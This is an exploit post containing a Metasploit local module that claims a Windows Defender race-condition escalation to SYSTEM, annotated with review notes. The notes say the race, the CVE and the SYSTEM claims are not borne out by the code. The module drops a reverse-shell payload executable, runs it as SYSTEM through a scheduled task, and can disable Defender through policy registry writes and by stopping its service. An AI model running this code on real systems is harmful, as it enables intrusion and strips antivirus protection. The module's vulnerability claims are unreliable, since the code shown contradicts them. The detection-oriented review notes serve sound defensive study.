==================================================================================================================================
| # Title : Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.microsoft.com/ |
==================================================================================================================================

[+] Summary :

A race condition exists between Windows Defender's MpCleanCallbackFunction (cleanup routine) and Volume Shadow Copy creation. This vulnerability allows an attacker to escalate privileges to NT AUTHORITY\SYSTEM.

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Review notes (what the code below actually does, as opposed to what the
# header and 'Description' claim):
#
# * No method in this module touches MpCleanCallbackFunction, a virtual-disk
#   API, a token API or CreateProcessAsUser. The "race" is a PowerShell loop
#   that creates shadow copies, launches MpCmdRun scans and writes/deletes a
#   temp file; the "SYSTEM" step is a scheduled task created with
#   `/ru SYSTEM`, which itself needs administrative rights.
# * Every privileged action (Win32_ShadowCopy.Create, Stop-Service /
#   Set-Service on WinDefend, HKLM policy writes, schtasks /ru SYSTEM) runs
#   from a session that `exploit` only *warns* is not admin. Nothing here
#   demonstrates escalation from a low-privileged user; an admin -> SYSTEM
#   session via schtasks is expected behaviour, not a Defender bug.
# * Success markers are printed on the wrong condition (trigger_race_condition
#   reports success on *any* exception; disable_defender_persistence and
#   execute_system_payload's method 2 print their marker unconditionally), so
#   the module's own output cannot be used as evidence that anything worked.
# * Artifacts left on the host (useful for detection of a run of this module):
#   C:\Windows\Temp\race_test_<n>.txt, a .iso and a payload .exe in the TEMP
#   directory, up to RACE_ITERATIONS new shadow copies and MpCmdRun
#   processes, a scheduled task named TempTask<6 letters> running as SYSTEM,
#   and (with DISABLE_DEFENDER) policy values under
#   HKLM\SOFTWARE\Policies\Microsoft\Windows Defender.
class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options.
  # NOTE(review): the 'Description' names OpenVirtualDisk / AttachVirtualDisk
  # and CreateProcessAsUser; neither appears anywhere in the code below
  # (mount_iso uses Mount-DiskImage, execute_system_payload uses
  # ProcessStartInfo and schtasks). The 'CVE' reference is a placeholder
  # ('2026-XXXXX'), not an assigned identifier.
  # NOTE(review): the default PAYLOAD is x64 while ARCH_X86 is also listed as
  # a target; the x86 target would need a different payload to be selected.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation',
        'Description' => %q{
          A race condition exists between Windows Defender's MpCleanCallbackFunction
          (cleanup routine) and Volume Shadow Copy creation. This vulnerability allows
          an attacker to escalate privileges to NT AUTHORITY\SYSTEM.

          The exploit uses:
          - Fake ISO mount via OpenVirtualDisk / AttachVirtualDisk
          - Real-time priority escalation (REALTIME_PRIORITY_CLASS)
          - Speed racing against Defender's cleanup routine

          Successful exploitation results in:
          1. Local Privilege Escalation to SYSTEM via CreateProcessAsUser
          2. Use-after-free condition causing Windows Defender to crash
          3. System remains without antivirus protection

          Tested on Windows 10/11 with Windows Defender enabled.
        },
        'License' => MSF_LICENSE,
        'Author' => ['indoushka'],
        'Platform' => ['win'],
        'Arch' => [ARCH_X64, ARCH_X86],
        'SessionTypes' => ['meterpreter', 'shell'],
        'Targets' => [
          ['Windows x64', { 'Arch' => ARCH_X64 }],
          ['Windows x86', { 'Arch' => ARCH_X86 }]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
          'EXITFUNC' => 'thread'
        },
        'References' => [
          ['URL', 'https://www.microsoft.com/'],
          ['CVE', '2026-XXXXX']
        ],
        'DisclosureDate' => '2026-06-11',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # NOTE(review): 'TEMP' is read via datastore['TEMP'] in create_fake_iso and
    # execute_system_payload but is not registered here, so it is nil unless
    # set globally and the hard-coded fallback paths are used.
    register_options([
      OptInt.new('RACE_ITERATIONS', [false, 'Number of race iterations', 100]),
      OptBool.new('DISABLE_DEFENDER', [false, 'Attempt to permanently disable Defender', false]),
      OptBool.new('CLEANUP', [true, 'Restore Defender functionality after exploit', true])
    ])
  end

  # Returns CheckCode::Appears when an MsMpEng.exe process exists, else Safe.
  # NOTE(review): this only tests that Defender is running; it does not probe
  # for the claimed vulnerability, so "Appears" is reported on every host with
  # Defender enabled.
  def check
    defender_pid = get_defender_pid
    if defender_pid
      print_good("Windows Defender is running (PID: #{defender_pid})")
      return CheckCode::Appears
    end
    CheckCode::Safe
  end

  # Returns the PID of the first process named msmpeng.exe (case-insensitive),
  # or nil when none is found.
  # NOTE(review): client.sys.process.get_processes is a Meterpreter API; the
  # 'shell' session type listed in SessionTypes presumably cannot reach it —
  # verify before relying on that session type.
  def get_defender_pid
    processes = client.sys.process.get_processes
    processes.each do |proc|
      if proc['name'] && proc['name'].downcase == 'msmpeng.exe'
        return proc['pid']
      end
    end
    nil
  end

  # Prints and returns sysinfo['OS']. Not called from anywhere in this module.
  def get_system_version
    version = sysinfo['OS']
    print_status("Target OS: #{version}")
    version
  end

  # Writes a 2560-byte file made of the repeated string "CD001" into the TEMP
  # directory and registers it for cleanup; returns its path.
  # NOTE(review): "CD001" * 512 is not an ISO 9660 image (the volume
  # descriptor set starts at sector 16, i.e. byte 0x8000, which this file
  # never reaches), so Mount-DiskImage is expected to reject it and mount_iso
  # to take its failure branch.
  # NOTE(review): 'C:\\\\Temp' is single-quoted Ruby, so the fallback path is
  # literally C:\\Temp (two separators) followed by another backslash.
  def create_fake_iso
    print_status("Creating fake ISO file for mount operation...")
    iso_path = "#{datastore['TEMP'] || 'C:\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.iso"
    register_file_for_cleanup(iso_path)
    iso_content = "CD001" * 512
    write_file(iso_path, iso_content)
    print_good("Fake ISO created: #{iso_path}")
    iso_path
  end

  # Runs Mount-DiskImage on iso_path through a fresh powershell.exe and
  # returns true only when the script printed MOUNT_SUCCESS.
  # NOTE(review): despite the status message, no VirtualDisk API
  # (OpenVirtualDisk / AttachVirtualDisk) is used — only the Mount-DiskImage
  # cmdlet. The mount result is never used by the rest of the module except
  # to print a warning in `exploit`.
  def mount_iso(iso_path)
    print_status("Mounting fake ISO using VirtualDisk API...")
    mount_ps = <<~PS
      $isoPath = "#{iso_path}"
      try {
        Mount-DiskImage -ImagePath $isoPath -PassThru
        Write-Host "MOUNT_SUCCESS"
      } catch {
        Write-Host "MOUNT_FAILED: $($_.Exception.Message)"
      }
    PS
    # Each cmd_exec spawns a separate powershell.exe; inner double quotes are
    # escaped for the outer -Command argument.
    result = cmd_exec("powershell -Command \"#{mount_ps.gsub('"', '\\"')}\"")
    if result.include?("MOUNT_SUCCESS")
      print_good("ISO mounted successfully")
      return true
    else
      print_error("Failed to mount ISO: #{result}")
      return false
    end
  end

  # Runs Dismount-DiskImage on iso_path. The UNMOUNT_* marker is printed but
  # never checked; the return value is whatever cmd_exec returns.
  def unmount_iso(iso_path)
    print_status("Unmounting ISO...")
    unmount_ps = <<~PS
      $isoPath = "#{iso_path}"
      try {
        Dismount-DiskImage -ImagePath $isoPath
        Write-Host "UNMOUNT_SUCCESS"
      } catch {
        Write-Host "UNMOUNT_FAILED"
      }
    PS
    cmd_exec("powershell -Command \"#{unmount_ps.gsub('"', '\\"')}\"")
  end

  # Sets the priority class of the *spawned powershell.exe* ($pid is that
  # process's own PID) to RealTime and returns true when PRIORITY_SET was
  # printed.
  # NOTE(review): that PowerShell process exits as soon as this command
  # finishes; the race loop in trigger_race_condition runs in a different
  # powershell.exe, so the priority change has no effect on it. Raising a
  # process to RealTime also presumably needs SeIncreaseBasePriorityPrivilege
  # (i.e. an elevated token) — confirm; a non-elevated caller would be capped
  # at a lower class.
  def set_realtime_priority
    print_status("Setting process to realtime priority...")
    priority_ps = <<~PS
      $process = Get-Process -Id $pid
      $process.PriorityClass = [System.Diagnostics.ProcessPriorityClass]::RealTime
      Write-Host "PRIORITY_SET"
    PS
    result = cmd_exec("powershell -Command \"#{priority_ps.gsub('"', '\\"')}\"")
    result.include?("PRIORITY_SET")
  end

  # Loops `iterations` times: creates a shadow copy of C:\ via
  # Win32_ShadowCopy.Create, starts an MpCmdRun scan, writes and deletes
  # C:\Windows\Temp\race_test_<i>.txt, then sleeps 50 ms. Returns true when
  # the output contains RACE_TRIGGERED.
  # NOTE(review): RACE_TRIGGERED_AT_<i> is written by the *catch* block, so
  # the method reports "success" whenever any statement in the try block
  # throws — e.g. Win32_ShadowCopy.Create being denied to a non-admin caller
  # or MpCmdRun.exe being absent — and "not triggered" when every iteration
  # completed normally. Nothing in the loop depends on, inspects or times
  # Defender's cleanup routine, so there is no observable race here.
  # NOTE(review): $vss is assigned but unused; MpCmdRun's -ScanType 3 is its
  # custom scan, which per its usage text expects a -File argument that is
  # not supplied — confirm what the spawned scan actually does.
  # Detection: each iteration leaves a new shadow copy, a new MpCmdRun
  # process and a write/delete of race_test_<i>.txt under C:\Windows\Temp.
  def trigger_race_condition(iterations)
    print_status("Triggering race condition (#{iterations} iterations)...")
    race_ps = <<~PS
      $iterations = #{iterations}
      $successCount = 0
      for ($i = 0; $i -lt $iterations; $i++) {
        try {
          $vss = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\\", "ClientAccessible")
          Start-Process -FilePath "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -ArgumentList "-Scan -ScanType 3" -WindowStyle Hidden
          $testFile = "C:\\Windows\\Temp\\race_test_$i.txt"
          "test" | Out-File -FilePath $testFile -ErrorAction SilentlyContinue
          Remove-Item $testFile -ErrorAction SilentlyContinue
          $successCount++
        } catch {
          Write-Host "RACE_TRIGGERED_AT_$i"
        }
        Start-Sleep -Milliseconds 50
      }
      Write-Host "COMPLETED:$successCount"
    PS
    result = cmd_exec("powershell -Command \"#{race_ps.gsub('"', '\\"')}\"")
    if result.include?("RACE_TRIGGERED")
      print_good("Race condition triggered successfully!")
      return true
    else
      print_warning("Race condition may not have triggered")
      return false
    end
  end

  # Returns the WinDefend service status as a string (e.g. "Running"),
  # "NOT_FOUND" when the service does not exist, or nil when the marker is
  # missing from the output. Its result is stored but never used by `exploit`.
  def check_defender_status
    status_ps = <<~PS
      $service = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
      if ($service) {
        Write-Host "DEFENDER_STATUS:$($service.Status)"
      } else {
        Write-Host "DEFENDER_STATUS:NOT_FOUND"
      }
    PS
    result = cmd_exec("powershell -Command \"#{status_ps.gsub('"', '\\"')}\"")
    result.match(/DEFENDER_STATUS:(\w+)/)&.captures&.first
  end

  # Only runs when DISABLE_DEFENDER is set. Turns off real-time monitoring,
  # stops and disables the WinDefend service and writes DisableAntiSpyware /
  # DisableRealtimeMonitoring policy values under HKLM.
  # NOTE(review): every step carries -ErrorAction SilentlyContinue and
  # DEFENDER_DISABLED is printed unconditionally, so the method returns true
  # even when all of the steps were denied. Each step needs administrative
  # rights, and with Tamper Protection enabled the Set-MpPreference and policy
  # changes are presumably ignored — the module does not check for it.
  # Detection: service stop / startup-type change and the policy writes under
  # HKLM\SOFTWARE\Policies\Microsoft\Windows Defender are the observable
  # changes behind the IOC_IN_LOGS note.
  def disable_defender_persistence
    print_status("Attempting to permanently disable Windows Defender...")
    disable_ps = <<~PS
      Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
      Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue
      Set-Service -Name WinDefend -StartupType Disabled -ErrorAction SilentlyContinue
      $regPath = "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
      New-Item -Path $regPath -Force -ErrorAction SilentlyContinue
      Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1 -Force -ErrorAction SilentlyContinue
      $rtpPath = "$regPath\\Real-Time Protection"
      New-Item -Path $rtpPath -Force -ErrorAction SilentlyContinue
      Set-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring" -Value 1 -Force -ErrorAction SilentlyContinue
      Write-Host "DEFENDER_DISABLED"
    PS
    result = cmd_exec("powershell -Command \"#{disable_ps.gsub('"', '\\"')}\"")
    result.include?("DEFENDER_DISABLED")
  end

  # Runs when CLEANUP is set (default true). Removes DisableAntiSpyware,
  # re-enables and starts WinDefend and turns real-time monitoring back on.
  # NOTE(review): the cleanup is incomplete relative to
  # disable_defender_persistence — the "Real-Time Protection\
  # DisableRealtimeMonitoring" policy value it creates is never removed here,
  # so that policy setting survives a run with DISABLE_DEFENDER and CLEANUP
  # both set.
  def restore_defender
    print_status("Restoring Windows Defender...")
    restore_ps = <<~PS
      Remove-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" -Name "DisableAntiSpyware" -ErrorAction SilentlyContinue
      Set-Service -Name WinDefend -StartupType Automatic -ErrorAction SilentlyContinue
      Start-Service -Name WinDefend -ErrorAction SilentlyContinue
      Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue
      Write-Host "DEFENDER_RESTORED"
    PS
    cmd_exec("powershell -Command \"#{restore_ps.gsub('"', '\\"')}\"")
  end

  # Drops the generated payload EXE into TEMP and tries to run it twice.
  # Returns true when either PAYLOAD_EXECUTED_M1 or _M2 appears in the output.
  # NOTE(review): method 1 never obtains, duplicates or impersonates a token.
  # `[System.IntPtr]::$token = $winlogon.Handle` is not a token operation
  # (whether it throws or is a no-op, nothing after it uses $token), and
  # Process.Start with a plain ProcessStartInfo launches the payload in the
  # caller's own security context — so if M1 runs, the resulting session is
  # the current user, not SYSTEM, despite the "as SYSTEM!" message.
  # NOTE(review): method 2 relies on `schtasks /ru SYSTEM`, which requires an
  # administrative caller; a SYSTEM session from it is the ordinary
  # admin -> SYSTEM step and not evidence of a Defender flaw. schtasks is a
  # native command, so a non-zero exit does not raise a terminating error
  # inside try{} (at least on Windows PowerShell 5.x), and
  # PAYLOAD_EXECUTED_M2 is printed even when task creation was denied.
  # NOTE(review): 'C:\\\\Windows\\\\Temp' is single-quoted, so the fallback
  # path contains doubled separators (C:\\Windows\\Temp).
  # Detection: payload file in TEMP, and a scheduled task named
  # TempTask<6 letters> created as SYSTEM, run and deleted within seconds
  # (auditable as task creation/deletion events when task auditing is on).
  def execute_system_payload
    print_status("Attempting to execute payload as SYSTEM...")
    payload_exe = generate_payload_exe
    payload_path = "#{datastore['TEMP'] || 'C:\\\\Windows\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.exe"
    write_file(payload_path, payload_exe)
    register_file_for_cleanup(payload_path)
    exec_ps = <<~PS
      $payload = "#{payload_path}"
      try {
        $winlogon = Get-Process -Name winlogon
        $token = [System.IntPtr]::Zero
        [System.IntPtr]::$token = $winlogon.Handle
        $startInfo = New-Object System.Diagnostics.ProcessStartInfo
        $startInfo.FileName = $payload
        $startInfo.UseShellExecute = $false
        $startInfo.CreateNoWindow = $true
        [System.Diagnostics.Process]::Start($startInfo)
        Write-Host "PAYLOAD_EXECUTED_M1"
      } catch {
        Write-Host "M1_FAILED: $($_.Exception.Message)"
      }
      try {
        $taskName = "TempTask#{Rex::Text.rand_text_alpha(6)}"
        schtasks /create /tn $taskName /tr $payload /sc once /st 00:00 /ru SYSTEM /f
        schtasks /run /tn $taskName
        schtasks /delete /tn $taskName /f
        Write-Host "PAYLOAD_EXECUTED_M2"
      } catch {
        Write-Host "M2_FAILED"
      }
    PS
    result = cmd_exec("powershell -Command \"#{exec_ps.gsub('"', '\\"')}\"")
    if result.include?("PAYLOAD_EXECUTED")
      print_good("Payload executed as SYSTEM!")
      return true
    else
      print_warning("Payload execution may have failed: #{result}")
      return false
    end
  end

  # Entry point. Sequence: admin check (warning only) -> Defender PID ->
  # priority -> fake ISO -> race loop -> unmount -> PID compare -> payload ->
  # optional disable -> optional restore.
  # NOTE(review): the outcome of the race loop (race_success) and
  # original_defender_status are assigned but never read; execute_system_payload
  # is called unconditionally, so the payload step is independent of whether
  # anything "raced". A changed MsMpEng.exe PID only shows the process
  # restarted during the run; the cause is not established here.
  # NOTE(review): is_admin? failing is only a warning, yet every step that
  # could yield a SYSTEM session or alter Defender requires admin — see the
  # class-level notes.
  def exploit
    print_status("CVE-2026-XXXXX - Windows Defender MsMpEng.exe Race Condition LPE")
    print_status("Target: #{sysinfo['Computer']}")
    unless is_admin?
      print_warning("Not running as admin - exploit may fail")
    end
    defender_pid = get_defender_pid
    unless defender_pid
      print_error("Windows Defender is not running. Exploit may not work.")
      return
    end
    print_good("Windows Defender is running (PID: #{defender_pid})")
    original_defender_status = check_defender_status
    set_realtime_priority
    iso_path = create_fake_iso
    unless mount_iso(iso_path)
      print_warning("ISO mount failed, continuing anyway...")
    end
    iterations = datastore['RACE_ITERATIONS'] || 100
    race_success = trigger_race_condition(iterations)
    unmount_iso(iso_path)
    new_defender_pid = get_defender_pid
    if new_defender_pid != defender_pid
      print_good("Windows Defender appears to have crashed/restarted!")
    else
      print_warning("Windows Defender still running - race condition may not have succeeded")
    end
    execute_system_payload
    if datastore['DISABLE_DEFENDER']
      disable_defender_persistence
      print_good("Windows Defender persistence disabled")
    end
    if datastore['CLEANUP']
      restore_defender
      print_good("Windows Defender restored")
    end
    print_good("Exploit completed - Check for SYSTEM session")
  end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================